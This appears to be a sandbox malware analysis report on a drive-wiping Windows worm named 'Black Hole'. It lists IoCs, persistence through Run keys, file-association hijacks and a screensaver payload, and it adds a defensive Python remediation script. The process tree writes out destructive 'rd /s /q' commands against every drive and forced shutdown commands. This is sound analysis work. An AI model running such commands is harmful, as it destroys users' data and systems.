Analysis
max time kernel: 149s
max time network: 102s
platform: windows10-2004_x64
resource: win10v2004-20240426-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
submitted: 01-06-2024 03:52
Static task: static1
Behavioral task: behavioral1
Sample: d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe
Resource: win7-20240221-en
Behavioral task: behavioral2
Sample: d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe
Resource: win10v2004-20240426-en
General
Target: d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe
Size: 70KB
MD5: 2fd685a44814d363e81a07de7bee5233
SHA1: a9170c0738cf9f0d746ff409907f13a93f0baf04
SHA256: d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c
SHA512: 5bfddc19d55b0377410e1681de30336956f9f9f59b26f8237863079b7b0df0d05aec773ea5e3045dba3b5bed4109b536c75a171d356494285a8a5dd498c87bf5
SSDEEP: 768:1iCHI1nffAkGisSQ6KRcJZOYoBudWaDyqzlL49FLdS5yA+jz+CEo+R5nOwekfZUW:1LHIlfH7Q6qRBwWa2qxQFZA+j6/Ww+9
Malware Config
Signatures
Modifies WinLogon for persistence 2 TTPs 18 IoCs
Modifies visibility of file extensions in Explorer 2 TTPs 9 IoCs
Modifies visibility of hidden/system files in Explorer 2 TTPs 9 IoCs
Disables RegEdit via registry modification 18 IoCs
Disables Task Manager via registry modification
Disables use of System Restore points 1 TTPs
Executes dropped EXE 56 IoCs
Loads dropped DLL 7 IoCs
Modifies system executable filetype association 2 TTPs 64 IoCs
Adds Run key to start application 2 TTPs 45 IoCs
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process
(one "File opened (read-only)" event per drive letter, 64 in total, grouped by process)
File opened (read-only) \??\G: \??\H: \??\M: \??\N: \??\O: \??\Q: \??\U: \??\V: \??\W: \??\Y: \??\Z: d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe
File opened (read-only) \??\G: \??\H: \??\M: \??\P: \??\U: \??\Z: Black Hole.exe
File opened (read-only) \??\K: \??\L: \??\O: \??\U: \??\V: \??\W: \??\X: Lubang Hitam.exe
File opened (read-only) \??\B: \??\G: \??\H: \??\K: \??\N: \??\S: \??\T: \??\U: WINLOGON.EXE
File opened (read-only) \??\G: \??\H: \??\J: \??\K: \??\N: \??\Q: \??\R: \??\S: \??\U: \??\Y: CSRSS.EXE
File opened (read-only) \??\J: \??\K: \??\N: \??\O: \??\P: \??\V: \??\W: \??\Z: SERVICES.EXE
File opened (read-only) \??\E: \??\I: \??\L: \??\P: \??\V: \??\W: LSASS.EXE
File opened (read-only) \??\G: \??\I: \??\L: \??\R: \??\T: \??\W: \??\X: \??\Z: SMSS.EXE
Drops autorun.inf file 1 TTPs 8 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
description ioc Process
File opened for modification C:\Autorun.inf d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe
File created F:\Autorun.inf d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe
File opened for modification F:\Autorun.inf d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe
File created F:\Autorun.inf Lubang Hitam.exe
File opened for modification F:\Autorun.inf Lubang Hitam.exe
File created F:\Autorun.inf WINLOGON.EXE
File opened for modification F:\Autorun.inf WINLOGON.EXE
File created C:\Autorun.inf d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe
Drops file in System32 directory 50 IoCs
description ioc Process
File created C:\Windows\SysWOW64\Shell.exe d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe
File opened for modification C:\Windows\SysWOW64\Shell.exe d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe, Black Hole.exe, Lubang Hitam.exe, WINLOGON.EXE, CSRSS.EXE, SERVICES.EXE, LSASS.EXE, SMSS.EXE
File created C:\Windows\SysWOW64\Lubang Hitam.exe d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe, Black Hole.exe, Lubang Hitam.exe, WINLOGON.EXE, CSRSS.EXE, SERVICES.EXE, LSASS.EXE, SMSS.EXE
File opened for modification C:\Windows\SysWOW64\Lubang Hitam.exe d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe, Black Hole.exe, Lubang Hitam.exe, WINLOGON.EXE, CSRSS.EXE, SERVICES.EXE, LSASS.EXE, SMSS.EXE
File created C:\Windows\SysWOW64\Destruction.scr d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe
File opened for modification C:\Windows\SysWOW64\Destruction.scr d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe, Black Hole.exe, Lubang Hitam.exe, WINLOGON.EXE, CSRSS.EXE, SERVICES.EXE, LSASS.EXE, SMSS.EXE
File created C:\Windows\SysWOW64\msvbvm60.dll Lubang Hitam.exe (x8)
File opened for modification C:\Windows\SysWOW64\msvbvm60.dll Lubang Hitam.exe (x8)
(50 events.) Every path lands under SysWOW64 although the registry values written below name C:\Windows\system32\Shell.exe and C:\Windows\system32\DESTRU~1.SCR: the sample is a 32-bit executable (it ships the VB6 runtime msvbvm60.dll), so WOW64 file-system redirection silently turns its writes to C:\Windows\system32\ into C:\Windows\SysWOW64\. A 64-bit process that follows those registry values resolves C:\Windows\system32\ to the native System32 directory, where these files do not exist.
Drops file in Windows directory 45 IoCs
description ioc Process
File created C:\Windows\msvbvm60.dll Lubang Hitam.exe (x8)
File opened for modification C:\Windows\msvbvm60.dll Lubang Hitam.exe (x8)
File created C:\Windows\Black Hole.exe d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe, Black Hole.exe, SMSS.EXE
File opened for modification C:\Windows\Black Hole.exe d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe, Black Hole.exe, Lubang Hitam.exe, WINLOGON.EXE, CSRSS.EXE, SERVICES.EXE, LSASS.EXE, SMSS.EXE
File created C:\WINDOWS\Black Hole.txt d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe
File opened for modification C:\WINDOWS\Black Hole.txt d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe, Black Hole.exe, Lubang Hitam.exe, WINLOGON.EXE, CSRSS.EXE, SERVICES.EXE, LSASS.EXE, SMSS.EXE
File created C:\WINDOWS\Hacked By Gerry.txt d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe
File opened for modification C:\WINDOWS\Hacked By Gerry.txt d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe, Black Hole.exe, Lubang Hitam.exe, WINLOGON.EXE, CSRSS.EXE, SERVICES.EXE, LSASS.EXE, SMSS.EXE
(45 events.)
Modifies Control Panel 54 IoCs
description ioc Process
(54 events; every row below was produced by all eight processes, with Black Hole.exe appearing twice)
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Mouse\
    Process: d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe, Black Hole.exe (x2), Lubang Hitam.exe, WINLOGON.EXE, CSRSS.EXE, SERVICES.EXE, LSASS.EXE, SMSS.EXE
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\
    Process: d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe, Black Hole.exe (x2), Lubang Hitam.exe, WINLOGON.EXE, CSRSS.EXE, SERVICES.EXE, LSASS.EXE, SMSS.EXE
Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\SCRNSAVE.EXE = "C:\\Windows\\system32\\DESTRU~1.SCR"
    Process: d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe, Black Hole.exe (x2), Lubang Hitam.exe, WINLOGON.EXE, CSRSS.EXE, SERVICES.EXE, LSASS.EXE, SMSS.EXE
Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\ScreenSaverIsSecure = "0"
    Process: d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe, Black Hole.exe (x2), Lubang Hitam.exe, WINLOGON.EXE, CSRSS.EXE, SERVICES.EXE, LSASS.EXE, SMSS.EXE
Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\ScreenSaveTimeOut = "600"
    Process: d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe, Black Hole.exe (x2), Lubang Hitam.exe, WINLOGON.EXE, CSRSS.EXE, SERVICES.EXE, LSASS.EXE, SMSS.EXE
Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Mouse\SwapMouseButtons = "1"
    Process: d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe, Black Hole.exe (x2), Lubang Hitam.exe, WINLOGON.EXE, CSRSS.EXE, SERVICES.EXE, LSASS.EXE, SMSS.EXE
DESTRU~1.SCR is the 8.3 short name of the Destruction.scr dropped in the System32 signature above: after 600 seconds of inactivity the unlocked screensaver (ScreenSaverIsSecure = 0) re-launches the worm's payload as the logged-on user, a persistence path that survives removal of the Run keys alone. SwapMouseButtons = 1 is plain sabotage of the user's session.
Modifies registry class 64 IoCs
description ioc Process
(64 events, grouped by key and value)
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*"
    Process: d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe, WINLOGON.EXE, SERVICES.EXE, SMSS.EXE
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*"
    Process: d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe, WINLOGON.EXE, CSRSS.EXE, SERVICES.EXE, LSASS.EXE, SMSS.EXE
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*"
    Process: d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*"
    Process: Black Hole.exe, CSRSS.EXE, SERVICES.EXE, LSASS.EXE, SMSS.EXE
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\scrfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*"
    Process: d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe, Black Hole.exe, CSRSS.EXE, LSASS.EXE
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*"
    Process: d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe, Lubang Hitam.exe, CSRSS.EXE, SERVICES.EXE
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\ = "File Folder"
    Process: d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe, Black Hole.exe (x2), WINLOGON.EXE, CSRSS.EXE, LSASS.EXE, SMSS.EXE
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile
    Process: d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe, Black Hole.exe, WINLOGON.EXE, SERVICES.EXE
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command
    Process: d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe, Black Hole.exe, WINLOGON.EXE, SERVICES.EXE, SMSS.EXE
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command
    Process: Black Hole.exe, WINLOGON.EXE, SERVICES.EXE, SMSS.EXE
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command
    Process: d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe, Black Hole.exe (x2), WINLOGON.EXE, CSRSS.EXE, LSASS.EXE, SMSS.EXE
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command
    Process: d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe, Black Hole.exe, WINLOGON.EXE, SMSS.EXE
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\scrfile\shell\open\command
    Process: Black Hole.exe, SERVICES.EXE, LSASS.EXE
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell
    Process: d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command
    Process: Black Hole.exe (x2), Lubang Hitam.exe, CSRSS.EXE, SMSS.EXE
This is a file-association hijack: with these handlers in place every .exe, .bat, .com, .pif, .scr and .lnk that the user opens through the shell is started via the dropped Shell.exe, which receives the real target as "%1" %*. Setting the exefile default value to "File Folder" makes executables display with that type description in Explorer. When cleaning up, restore these handler values before deleting Shell.exe or launching any tool from Explorer; otherwise the next double-click either re-runs the worm or fails because the handler is gone.
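The Run-key, Control Panel and file-class signatures above are all flat "description ioc Process" lines. The Python below is an added example, not code from the report or from the sample; it parses a few event lines copied from this page into structured records, classifies each one (persistence, masquerading system-process names, handler hijack, screensaver payload), and emits the cleanup commands in an order that undoes the exefile hijack before anything else is launched. The stock handler values in STOCK_OPEN_COMMAND, the "protected image name" list and the reg.exe/del command forms are assumptions from a clean Windows 10 reference host, not facts from the report; diff them against a known-good machine before running anything.

```python
"""Parse sandbox registry events into launch points and order their removal."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Image names the sandbox attributed events to. Needed up front because names
# such as "Black Hole.exe" contain spaces and sit at the end of each line.
KNOWN_PROCESSES = [
    "d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe",
    "Black Hole.exe", "Lubang Hitam.exe", "WINLOGON.EXE", "CSRSS.EXE",
    "SERVICES.EXE", "LSASS.EXE", "SMSS.EXE",
]

# Constructed input: eight event lines copied from the report above.
SAMPLE_EVENTS = r'''
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\LogonAdmin = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE" Black Hole.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Black Hole = "C:\\Windows\\Black Hole.exe" Lubang Hitam.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\SCRNSAVE.EXE = "C:\\Windows\\system32\\DESTRU~1.SCR" CSRSS.EXE
Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Mouse\SwapMouseButtons = "1" SMSS.EXE
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" SERVICES.EXE
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\scrfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" LSASS.EXE
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\ = "File Folder" LSASS.EXE
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command Black Hole.exe
'''

PROTECTED_IMAGES = {"smss.exe", "csrss.exe", "winlogon.exe", "services.exe", "lsass.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Assumption: (Default) values of these handler keys on a clean Windows 10 host,
# from my own reference machine, not from the report. lnkfile has no
# shell\open\command at all by default.
STOCK_OPEN_COMMAND = {
    "exefile": '"%1" %*', "batfile": '"%1" %*', "comfile": '"%1" %*',
    "piffile": '"%1" %*', "scrfile": '"%1" /S', "lnkfile": None,
}

_LINE_RE = re.compile(
    r'^(?P<op>Key created|Set value \((?P<vtype>str|int)\)) '
    r'(?P<path>\\REGISTRY\\.+?)'
    r'(?: = "(?P<value>.*)")?'
    r' (?P<proc>' + "|".join(re.escape(p) for p in KNOWN_PROCESSES) + r')$'
)
_RUN_KEY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run$", re.I)
_CLASS_CMD_RE = re.compile(r"^HKLM\\SOFTWARE\\Classes\\(\w+)\\shell\\open\\command$", re.I)
_CLASS_ROOT_RE = re.compile(r"^HKLM\\SOFTWARE\\Classes\\(\w+)$", re.I)


@dataclass
class RegEvent:
    op: str                 # "Set value" or "Key created"
    key: str                # HKLM\... or HKU\<sid>\..., no trailing backslash
    name: str               # value name; "" is the key's (Default) value
    value: Optional[str]    # decoded value, None for "Key created"
    vtype: Optional[str]
    proc: str


def _normalize_root(path: str) -> str:
    """Map the kernel-style \\REGISTRY\\... prefix to reg.exe hive names."""
    if path.startswith("\\REGISTRY\\MACHINE\\"):
        return "HKLM\\" + path[len("\\REGISTRY\\MACHINE\\"):]
    m = re.match(r"\\REGISTRY\\USER\\(S-1-5-[\d-]+)\\(.*)", path)
    return "HKU\\" + m.group(1) + "\\" + m.group(2) if m else path


def parse_events(text: str) -> List[RegEvent]:
    events = []
    for line in text.strip().splitlines():
        m = _LINE_RE.match(line.strip())
        if not m:
            raise ValueError("unrecognised event line: " + line)
        path = _normalize_root(m.group("path"))
        if m.group("op").startswith("Set value"):
            key, _, name = path.rpartition("\\")            # trailing "\" -> (Default)
            value = re.sub(r'\\(["\\])', r"\1", m.group("value") or "")  # undo \\ and \"
            events.append(RegEvent("Set value", key, name, value, m.group("vtype"), m.group("proc")))
        else:
            events.append(RegEvent("Key created", path.rstrip("\\"), "", None, None, m.group("proc")))
    return events


def _q(s: str) -> str:
    """Quote a value for reg.exe /d; embedded quotes are written as \\"."""
    return '"' + s.replace('"', '\\"') + '"'


def classify(ev: RegEvent) -> List[dict]:
    """Findings for one event; priority 0 must be fixed before priority 4."""
    out = []

    def add(kind, priority, fix):
        out.append({"kind": kind, "priority": priority, "proc": ev.proc,
                    "key": ev.key, "name": ev.name, "fix": fix})

    m = _CLASS_CMD_RE.match(ev.key)
    if m:
        stock = STOCK_OPEN_COMMAND.get(m.group(1).lower())
        if stock is None:
            add("nonstandard_handler_key", 0, f'reg delete "{ev.key}" /f')
        elif ev.op == "Set value" and ev.name == "" and ev.value != stock:
            # Until the handler is restored every .exe launch goes via Shell.exe.
            add("file_association_hijack", 0, f'reg add "{ev.key}" /ve /d {_q(stock)} /f')
        return out
    m = _CLASS_ROOT_RE.match(ev.key)
    if m and m.group(1).lower() == "exefile" and ev.op == "Set value" and ev.name == "":
        add("file_type_label_changed", 1, f'reg add "{ev.key}" /ve /d "Application" /f')
        return out
    if _RUN_KEY_RE.search(ev.key) and ev.op == "Set value":
        add("run_key_persistence", 2, f'reg delete "{ev.key}" /v "{ev.name}" /f')
        image = ev.value.lower()
        if image.rsplit("\\", 1)[-1] in PROTECTED_IMAGES and not image.startswith(SYSTEM_DIRS):
            add("masquerading", 4, f"del /f {_q(ev.value)}")   # files go last
        return out
    low = ev.key.lower()
    if low.endswith("control panel\\desktop") and ev.name.upper() == "SCRNSAVE.EXE":
        add("screensaver_payload", 3, f'reg delete "{ev.key}" /v SCRNSAVE.EXE /f')
    elif low.endswith("control panel\\mouse") and ev.name == "SwapMouseButtons" and ev.value == "1":
        add("mouse_buttons_swapped", 3, f'reg add "{ev.key}" /v SwapMouseButtons /t REG_SZ /d 0 /f')
    return out


def remediation_plan(events: List[RegEvent]):
    """All findings plus a de-duplicated command list in safe execution order."""
    findings = [f for ev in events for f in classify(ev)]
    plan, seen = [], set()
    for f in sorted(findings, key=lambda f: f["priority"]):   # stable: keeps event order
        if f["fix"] not in seen:
            seen.add(f["fix"])
            plan.append(f["fix"])
    return findings, plan


if __name__ == "__main__":
    found, steps = remediation_plan(parse_events(SAMPLE_EVENTS))
    for f in found:
        print(f'{f["kind"]:<26} {f["proc"]:<18} {f["key"]}\\{f["name"]}')
    print("\nremediation order:")
    for s in steps:
        print("  " + s)
```

Two caveats when turning the plan into real commands on a host: the HKLM\SOFTWARE\WOW6432Node Run key is the 32-bit view and must be edited through that path (or from a 32-bit reg.exe), and HKU\<sid> is only mounted while that user's hive is loaded, so run the HKU steps in the victim's session or load the hive with reg load first.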
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process
2584 Black Hole.exe (x2)
4692 Black Hole.exe (x14)
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process
(64 events: each of the 32 shutdown.exe instances below enabled both Token: SeShutdownPrivilege and Token: SeRemoteShutdownPrivilege)
Token: SeShutdownPrivilege, Token: SeRemoteShutdownPrivilege 1452, 4892, 1036, 2352, 3304, 2372, 4460, 3740, 1840, 1400, 3532, 2340, 1580, 5068, 1084, 3712, 2244, 2200, 3028, 1196, 4268, 4752, 3644, 928, 3140, 1396, 4764, 4772, 3600, 1020, 1528, 3764 shutdown.exe
Suspicious use of SetWindowsHookEx 57 IoCs
Suspicious use of WriteProcessMemory 64 IoCs
System policy modification 1 TTPs 64 IoCs
Processes
C:\Users\Admin\AppData\Local\Temp\d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe  (level 1, PID 1508)  cmdline: "C:\Users\Admin\AppData\Local\Temp\d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe"
  - Modifies WinLogon for persistence
  - Modifies visibility of file extensions in Explorer
  - Modifies visibility of hidden/system files in Explorer
  - Windows security bypass
  - Disables RegEdit via registry modification
  - Modifies system executable filetype association
  - Windows security modification
  - Adds Run key to start application
  - Enumerates connected drives
  - Drops autorun.inf file
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Modifies Control Panel
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - System policy modification
  C:\WINDOWS\SysWOW64\shutdown.exe  (level 2, PID 1452)  cmdline: C:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!
    - Suspicious use of AdjustPrivilegeToken
  C:\WINDOWS\SysWOW64\cmd.exe  (level 2, PID 2616)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q z:
  C:\WINDOWS\SysWOW64\cmd.exe  (level 2, PID 1336)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q y:
  C:\WINDOWS\SysWOW64\cmd.exe  (level 2, PID 732)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q x:
  C:\WINDOWS\SysWOW64\cmd.exe  (level 2, PID 5040)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q w:
  C:\WINDOWS\SysWOW64\cmd.exe  (level 2, PID 2916)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q v:
  C:\WINDOWS\SysWOW64\cmd.exe  (level 2, PID 3048)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q u:
  C:\WINDOWS\SysWOW64\cmd.exe  (level 2, PID 2472)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q t:
  C:\WINDOWS\SysWOW64\cmd.exe  (level 2, PID 3228)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q s:
  C:\WINDOWS\SysWOW64\cmd.exe  (level 2, PID 5000)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q r:
  C:\WINDOWS\SysWOW64\cmd.exe  (level 2, PID 2452)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q q:
  C:\WINDOWS\SysWOW64\cmd.exe  (level 2, PID 3180)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q p:
  C:\WINDOWS\SysWOW64\cmd.exe  (level 2, PID 4256)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q o:
  C:\WINDOWS\SysWOW64\cmd.exe  (level 2, PID 4348)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q n:
  C:\WINDOWS\SysWOW64\cmd.exe  (level 2, PID 4252)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q m:
  C:\WINDOWS\SysWOW64\cmd.exe  (level 2, PID 3756)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q l:
  C:\WINDOWS\SysWOW64\cmd.exe  (level 2, PID 4360)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q k:
  C:\WINDOWS\SysWOW64\cmd.exe  (level 2, PID 4772)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q j:
  C:\WINDOWS\SysWOW64\cmd.exe  (level 2, PID 4840)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q i:
  C:\WINDOWS\SysWOW64\cmd.exe  (level 2, PID 4064)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q h:
  C:\WINDOWS\SysWOW64\cmd.exe  (level 2, PID 4368)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q g:
  C:\WINDOWS\SysWOW64\cmd.exe  (level 2, PID 1192)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q f:
  C:\WINDOWS\SysWOW64\cmd.exe  (level 2, PID 2180)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q e:
  C:\WINDOWS\SysWOW64\cmd.exe  (level 2, PID 1032)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q d:
  C:\WINDOWS\SysWOW64\cmd.exe  (level 2, PID 3408)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q c:
  C:\Windows\Black Hole.exe  (level 2, PID 2584)  cmdline: "C:\Windows\Black Hole.exe"
    - Modifies WinLogon for persistence
    - Modifies visibility of file extensions in Explorer
    - Modifies visibility of hidden/system files in Explorer
    - Windows security bypass
    - Disables RegEdit via registry modification
    - Executes dropped EXE
    - Modifies system executable filetype association
    - Windows security modification
    - Adds Run key to start application
    - Modifies Control Panel
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    - System policy modification
    C:\WINDOWS\SysWOW64\shutdown.exe  (level 3, PID 4892)  cmdline: C:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\Lubang Hitam.exe  (level 2, PID 4040)  cmdline: "C:\Windows\system32\Lubang Hitam.exe"
    - Modifies WinLogon for persistence
    - Modifies visibility of file extensions in Explorer
    - Modifies visibility of hidden/system files in Explorer
    - Windows security bypass
    - Disables RegEdit via registry modification
    - Executes dropped EXE
    - Modifies system executable filetype association
    - Windows security modification
    - Adds Run key to start application
    - Enumerates connected drives
    - Drops autorun.inf file
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Modifies Control Panel
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    - System policy modification
    C:\WINDOWS\SysWOW64\shutdown.exe  (level 3, PID 1036)  cmdline: C:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!
      - Suspicious use of AdjustPrivilegeToken
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 1960)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q z:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 4316)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q y:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 4324)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q x:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 4636)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q w:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 3748)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q v:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 4292)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q u:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 2340)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q t:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 2612)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q s:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 776)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q r:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 4208)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q q:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 1796)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q p:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 2556)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q o:
